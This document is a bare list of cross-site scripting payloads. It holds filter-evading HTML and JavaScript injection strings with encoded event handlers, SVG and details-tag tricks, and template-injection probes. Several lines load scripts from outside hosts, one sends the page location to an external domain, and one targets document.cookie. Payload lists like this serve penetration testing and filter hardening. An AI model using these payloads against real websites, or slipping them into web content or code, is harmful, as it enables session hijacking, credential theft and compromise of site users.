<style>@keyframes%20a{}b{animation:a;}</style><b/onanimationstart=prompt`${document.domain}&#x60;>
<SCr%00Ipt>confirm(1)</scR%00ipt>
<svg><script href=data />
<Img Src=//X55.is OnLoad%0C=x>
'"><A+href=%2522+AutoFocus+OnFocus=top/**/?.['ale'%2B'rt'](1)>
<a href="&#12;javascript:alert(1337)">Test</a>
1'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//>
bleh.pw"+style='animation-name:x' onanimationend='x'></a><style>@keyframes x{}</style>
<base href=https://x55.is>
%22%20accesskey=a%20onclick=x%3E
#"></div><a href= javascript&colon;alert&lpar;document&period;domain)
%3Cinput+onfocus%3d%27/*=*/Function(%22ale%22%2b%22rt(document.domain)%22)();//%27autofocus+
%3CScript%20src=data:text/javascript,alert(1337)%3E%3C/Script%3E
<form onclick=alert(1)><input id=attributes>Click me
<svg%20onx=()%20onload=(confirm)(document.domain)>
<details/open=/Open/href=/data=;+ontoggle="(alert)(document.domain)
<details/open=/Open/href=/data=+ontoggle="(alert)(document.domain)
<marquee+loop=1+width=0+onfinish='new+Function`al\ert\`1\``'>
<svg><circle><set%20onbegin=prompt(1)%20attributename=fill>
<dETAILS%0aopen%0aonToGgle%0a=%0aa=prompt,a()%20x>
"%3balert`1`%3b"
asd"`>%20onpointerenter=x=prompt,x`XSS`
<x%20onauxclick=import('//1152848220/')>click
<x%20onauxclick=a=alert,a(domain)>click%20-@niksthehacker
<x%20onauxclick=import('//1152848220/')>click
<x%20onauxclick=import('//xss/')>click
\"<>onauxclick<>=(eval)(atob(`YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ==`))>+<sss
{{constructor.constructor(alert`1`)()}}
javascript:new%20Function`al\ert\`1\``;
xhzeem*/eval?.(value+/()/.source)//"><input value=confirm autofocus onfocus='/*"
<xhzeem/x=" onmouseover=eva&#x6c;?.(id+/(document.domain)/.source) id=confirm>
<script>Object.prototype.BOOMR%20=%201;Object.prototype.url='https://portswigger-labs.net/xss/xss.js'</script>%20-https://portswigger.net/web-security/cross-site-scripting/cheat-sheet
"><a/\test="%26quot;x%26quot;"href='%01javascript:/*%b1*/;location.assign("//hackerone.com/stealthy?x="+location)'>Click
<details%0Aopen%0AonToGgle%0A=%0Aabc=(co\u006efirm);abc%28%60xss%60%26%2300000000000000000041//
%0A%0D%0A%0D%22%3C!%3E!%0D%0Atarget=%22_blank%22%0D%0Aonclick=%0D%0A%22%0D%0Ax=window[%27pr%27%2b%27o%27%2b%27m%27+%2b%27pt%27](%271%27)(%271%27)%0D%0Aompt,%0D%0Ax`Tiktok`
%EF%BC%9Cscript%EF%BC%9EPromPt(%EF%BC%9C/script%EF%BC%9E
'"%EF%BC%9E%EF%BC%9Cs%EF%BC%9E
\u0022\u003c%26quot;%26gt;%26lt;&#x22;&#x27;&#x3e;\"';}};“></textarea></SCRIPT><img src=x onerror=alert(69)>${{7*7}}
\u0022\u003c&quot;&gt;&lt;&#x22;&#x27;&#x3e;\"';}};“></textarea></SCRIPT><img/src/onerror=alert(69)>${{7*7}}
\u0022\u003c%26quot;%26gt;%26lt;\"';}};“></textarea></SCRIPT><script/src=//abc.bxss.in></script>{{7*7}}
';"/></textarea></script><script/src=//abc.bxss.in></script>
<details/open=/open/href=/data=;+ontoggle="(alert)(document.cookie)> 
<svg onload=prompt%26%230000000040document.domain)> 
<noscript><p%20title="</noscript><img%20src=x%20onerror=prompt``>">
<scr<script>ipt>alert(1)</scr</script>ipt>
JavaScript://%250Aalert?.()//
<IMG SRC=1 ONERROR=&#X61;&#X6C;&#X65;&#X72;&#X74;(1)>
<form onclick=alert(1)><input id=attributes>Click me
"><img src=x onerrora=confirm() onerror=confirm(1)>
navigation.navigate('javascript:adf')
<svg><animate onbegin=a attributeName=x dur=1s>
<a%20href%3D"jav%26NewLine%3Bas%26Tab%3Bcript%26colon%3Bx">
<a href="jav&NewLine;as&Tab;cript&colon;x">
<a%20href%3D"jav%26%23x00000000000061script%26colon%3Bx">
